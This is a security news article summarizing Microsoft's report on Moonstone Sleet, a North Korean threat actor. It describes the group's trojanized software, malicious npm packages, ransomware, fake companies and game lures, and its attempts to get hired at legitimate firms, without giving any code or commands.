Microsoft has named yet another state-aligned threat actor: Moonstone Sleet (formerly Storm-1789), which engages in cyberespionage and ransomware attacks to further goals of the North Korean regime.
“Moonstone Sleet uses tactics, techniques, and procedures (TTPs) also used by other North Korean threat actors over the last several years, highlighting the overlap among these groups,” Microsoft’s threat analysts say.
“When Microsoft first detected Moonstone Sleet activity, the actor demonstrated strong overlaps with Diamond Sleet, extensively reusing code from known Diamond Sleet malware like Comebacker and using well-established Diamond Sleet techniques to gain access to organizations, such as using social media to deliver trojanized software. However, Moonstone Sleet quickly shifted to its own bespoke infrastructure and attacks.”
Moonstone Sleet’s TTPs
Moonstone Sleet attackers:
- Delivered a trojanized version of PuTTY via LinkedIn, Telegram, and developer freelancing platforms to saddle victims with custom malware loaders
- Used malicious npm packages to deliver malicious payloads (including info-stealers)
- Delivered a custom ransomware variant (FakePenny) to a company it previously compromised, and asked for $6.6M in BTC to decrypt files
The group also “created” fake software development and IT consulting services companies by setting up legitimate-looking websites, fake employee personas and social media accounts, and used them to reach out to potential targets and solicit work or cooperation.
They used tracking pixels and a dummy unsubscribe page to confirm which targets engaged with the emails.
“Moonstone Sleet used a fake company called C.C. Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target the opportunity to collaborate, with a link to download the [DeTankWar] game included in the body of the message,” Microsoft noted.
Moonstone Sleet emails a link to the DeTankWar game (Source: Microsoft Threat Intelligence)
The linked executable included malicious DLLs that deliver a custom malware loader (YouieLoad), which loads malicious payloads in memory and creates malicious services for network and user discovery and browser data collection.
Finally, the group also tried to get employed as software developers at multiple legitimate companies.
“This activity could be consistent with previous reporting from the United States Department of Justice that North Korea was using highly skilled remote IT workers to generate revenue. On the other hand, this Moonstone Sleet activity may also be another approach to gaining access to organizations,” the analysts pointed out. This type of access could be used to mount software supply chain attacks.
Advice for potential targets
So far, the group has been spotted targeting a company that makes drone technology and another one that makes aircraft parts, a defense technology company, and organizations in the software/IT and education sectors.
Microsoft has shared recommendations, indicators of compromise and hunting queries organizations can use to mitigate the threat of a Moonstone Sleet attack or to spot evidence of a successful one.